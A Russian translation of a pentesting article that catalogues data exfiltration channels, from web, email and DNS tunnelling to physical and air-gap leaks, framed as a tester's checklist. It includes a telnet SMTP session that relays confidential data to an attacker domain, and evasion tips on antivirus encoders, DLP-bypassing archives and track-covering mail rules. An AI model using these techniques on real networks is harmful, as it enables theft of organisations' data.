04.11.2018

Обзор каналов утечки и кражи информации

image

Существует множество прекрасных статей и инструментов для реализации различных техник, и в этой заметке мы попытались собрать все воедино

Авторы: Alex Lomas и Alexander Schroll

Кража информации обычно является последней стадией целевой атаки на организацию. Существует множество прекрасных статей и инструментов для реализации различных техник, и в этой заметке мы попытались собрать все воедино. Этот документ также может использоваться в качестве чек-листа для пентестера, которого попросили провести анализ на предмет присутствия каналов утечки информации.

Рисунок 1: Типичная схема реализации атаки

Наш список ни в коей мере не является исчерпывающим, и, если вы знаете методы, о которых не упомянуто в этой статье, поделитесь своими мыслями в комментариях.

Веб-технологии

  1. Если в организации отсутствует что-либо похожее на прокси-сервер, ваше тестирование на предмет утечек с высокой степенью вероятности завершится результативно.

  2. Сайты наподобие pastebin, предназначенные для обмена информацией, или даже GitHub являются очевидным каналом утечки. GitHub часто разрешен во многих технологических компаниях.

  3. Если в организации используется прокси и фильтрация данных, потребуется поработать чуть интенсивнее, однако многие сервисы для хранения файлов, как, например, Dropbox, Google Drive или Box разрешены, особенно в организациях, которые пользуются сторонними облачными сервисами.

  4. Обычно перехват TLS (атаки типа «человек посередине) не доступны. Один из вариантов – развернуть отдельный домен с привязанным сертификатом LetsEncrypt.

  5. Даже если используется нечто похожее на Websense, многие типы сайтов, например, финансовые или медицинские, не подвергаются полной TLS-инспекции в целях безопасности сотрудников. Многие системы категоризации позволяют добавить сайт в нужную категорию. Таким образом, немного подготовившись, злоумышленник может создать собственным медицинский сайт и обойти фильтры.

  6. Flickr и YouTube доступны? В этих сервисах можно хранить большие файлы и использовать стеганографию.

  7. Возможно в организации есть веб-сервера, доступные через интернет, один из которых можно попытаться скомпрометировать в качестве промежуточной стадии.

Электронная почта

1. Если организация использует Office 365 или GSuite (проверьте MX-записи или почтовые заголовки), то с высокой степенью вероятности есть доступ к сервисам Gmail, Outlook.com или другим почтовым веб-службам.

2. Если доступны протоколы SMTP/POP3/IMAP, проверьте порты с шифрованием и без: 25/465/587, 110/995, 143/993.

3. Если существует неправильно настроенные локальные почтовые релеи, можно попробовать сделать ретрансляцию на внешний адрес через подделку (спуфинг) внутреннего адреса. Этот способ также хорош для внутреннего фишинга, который позволяет обойти фильтрацию сообщений (однако эта история для отдельной статьи).

   #telnet internal.smtp.local 25
      HELO attacker
MAIL FROM:<attacker@domain.com>
RCPT TO:<attacker@attackerdomain.com>
DATA
Here is lots of confidential data
.
QUIT

Очевидно, что вышеуказанный метод является нестабильным, особенно для передачи большого количества данных, но в крайнем случае может выручить.

4. Более сложный, но менее очевидный способ – скомпрометировать почтовый ящик при помощи фишинга и настройки правил в Outlook для автоматического перенаправления почты на внешний адрес. Обычно этот метод очень в тему для особо важных целей. Также можно установить правила для удаления отправленной корреспонденции и заметания следов.

Вредоносы

Meterpreter поверх HTTP/HTTPS/DNS

Meterpreter является часть фреймворка Metasploit и использует многоступенчатые полезные нагрузки, представляющие собой небольшие участки кода, которые выделяют память, открывают сетевые порты для коммуникации с фреймворком и запускают остальную часть кода. Более подробная информация доступна по ссылке https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

Чтобы обойти антивирус и защиту от сетевых вторжений, можно воспользоваться кодерами (например, Shikata Ga Nai), которые являются часть фреймворка Metasploit. Рабочую полезную нагрузку не нужно проверять в VirusTotal или других подобных сканерах, поскольку все загруженное передается антивирусным компаниям. Утилита MSFencode позволяет закодировать вашу полезную нагрузку одним из методов.

Сетевые протоколы

С этого момента методы становятся все более изощренными, но в начале давайте рассмотрим простые инструменты.

  1. Могут быть разрешены все исходящие соединения для протоколов FTP/SSH/SCP/SFTP или, по крайней мере, на некоторых машинах, которые участвуют в обмене данными. Соответствующие клиентские приложения также должны работать без каких-либо дополнительных телодвижений.

  2. DNS-туннелинг зачастую является успешным, поскольку эту тему сложно заблокировать полностью. Хотя многие организации осуществляют локальный мониторинг для обнаружения подобных атак впоследствии. Легендарная утилита dnscat2 очень проста в использовании.

  3. Некоторые системы IDS/IDP умеют детектировать DNS-туннелинг, но часто пропускают информацию, отправленную через записи DNS TXT. Мы разработали утилиту, позволяющую передавать записи этим методом: https://github.com/pentestpartners/Uninvited-Guest, и более ранняя и сырая версия https://github.com/pentestpartners/DNSTXT-encoder.

  4. Вы также можете попробовать воспользоваться сырыми TCP-сокетами, хотя этот метод скорее всего не сработает. Более вероятно, что разрешены исходящие соединения через протокол ICMP (который используется в диагностических целях и является важной частью в IPv6). С другой стороны, этот способ является довольно медленным. https://github.com/sensepost/DET

  5. Заголовки пакетов также могут использоваться для передачи информации https://github.com/omkartotade/Data-Exfiltration

  6. Не следует забывать про старую добрую технологию port knocking https://www.sans.org/reading-room/whitepapers/covert/portknockout-data-exfiltration-port-knocking-udp-37307

  7. Протоколы семейства P2P, как, например, bittorrent доступны?

  8. TOR и domain fronting (прикрытие доменом или доменное фронтирование) – прекрасный способ обхода фильтров особенно там, где при инспекции HTTPS не отслеживается несоответствие между внутренними и внешними именами https://blog.didierstevens.com/2018/01/20/quickpost-data-exfiltration-with-tor-browser-and-domain-fronting/

  9. Многие мессенджеры, как, например, Skype, Facebook Messenger и IRC также могут использоваться для передачи информации во внешний мир. В моей организации используется Skype для бизнеса и разрешено взаимодействие с «обычным» Skype и другими приложениями. https://www.sans.org/reading-room/whitepapers/covert/skype-data-exfiltration-34560

  10. Протоколы NTP и BGP зачастую разрешены и могут использоваться при утечках данных. https://www.darknet.org.uk/2016/11/pyexfil-python-data-exfiltration-tools/

  11. Удаленный рабочий стол часто используется для подключения дисков и буфера обмена, но даже если эти возможности отключены, можно воспользоваться PTP Rat для отсылки данных через экран.

  12. В сертификатах X509 могут быть внедрены бинарные данные, которые в свою очередь могут использоваться для передачи информации. https://github.com/fideliscyber/x509

Внутренние средства

  1. WMI-вызовы могут использоваться для инициации передачи, организации альтернативных потоков данных или использования копий теневых томов для сокрытия информации в целевых системах https://github.com/secabstraction/WmiSploit

  2. Windows BITS также можно использовать для планирования трансферов или снижения интенсивности передачи с целью обхода триггеров, связанных с повышенной активностью.

Файловые архивы

В организации может быть разрешена передача информации, например, посредством электронной почты, однако в DLP могут быть правила блокировки отдельных сигнатур. Для обхода фильтров в DLP попробуйте упаковать файлы в архив:

  • Обычный zip.

  • Zip с паролем.

  • Многократно вложенный zip (многие системы останавливают сканирование, если уровень вложенности превышает 10-100, с целью избежания файловых бомб).

  • 7zip.

  • Rar.

  • Cab.

  • Tar (+/- gzip)

  • Образ WIM.

Физические каналы

Если у злоумышленника или нечистоплотного инсайдера есть физический доступ к системе, возможные следующие варианты утечек:

  1. Через USB-порты ноутбука и рабочей станции, включая MP3 плееры, смартфоны и зашифрованные USB-флешки.

  2. Хотя в наши дни оптические драйвера редко используются в организациях, но все же нелишним будет проверить, разрешена ли запись на CD и DVD. С другой стороны, скопировать большие тома намного сложнее, чем на USB.

  3. Выносятся ли за пределы офиса идентификационные наклейки ноутбуков? Используются ли портативные устройства с полным шифрованием диска? Продаются или выбрасываются устаревшие компьютеры?

  4. С высокой степенью вероятности в организации используются принтеры, многие из которых имеют множество функций и могут эксплуатировать для получения списка предыдущих заданий на печать или даже для передачи информации по факсу. http://seclists.org/bugtraq/2016/Sep/54

  5. Может ли злоумышленник, находясь неподалеку, скомпрометировать корпоративный Wi-Fi (особенно, если используется WPA-PSK)? Насколько хорошо отделены ли гостевые Wi-Fi сети от главной корпоративной сети? В случае ненадежной изоляции, решен ли вопрос с запретом подключения корпоративных систем к гостевой Wi-Fi сети?

  6. xxx Может ли злоумышленник воспользоваться незащищенностью портов для внедрения устройства в сеть, как, например, Raspberry Pi с возможностью выполнения команд через собственное сотовое внеполосное подключение?

  7. Веб-камеры.

  8. Мобильные телефоны.

  9. Бумажные копии документов.

Бесконтактная утечка

  • Устройства, поддерживающие Bluetooth, могут стать целью злоумышленников даже без физического подключения, как через перехват управления, так и через распространение вредоносов сразу на множестве девайсов. https://blog.malwarebytes.com/cybercrime/2017/09/blueborne-bluetooths-airborne-influenza/

  • Колонки могут превратиться в микрофоны через специальную функцию аудио чипа. https://thehackernews.com/2018/03/air-gap-computer-hacking.html

  • Возможна кража информации с устройства, которое физически не подключено, когда данные передаются через мигание LED-индикаторов, способных мерцать до 6000 раз в секунду. https://www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/

  • Возможна утечка через магнитные сигналы, генерируемые процессорами компьютера. В этих атаках используется низкочастотные магнетические поля, и, соответственно, обходится экранирование Фарадея.

  • Возможна утечка данных от компьютеров, изолированных физически, через электросети.

  • Вредонос Fansmitter умеет изменять скорость вращения вентилятора компьютера и управлять издаваемым звуком. https://www.technologyreview.com/s/601816/how-fansmitter-malware-steals-data-from-air-gapped-computers/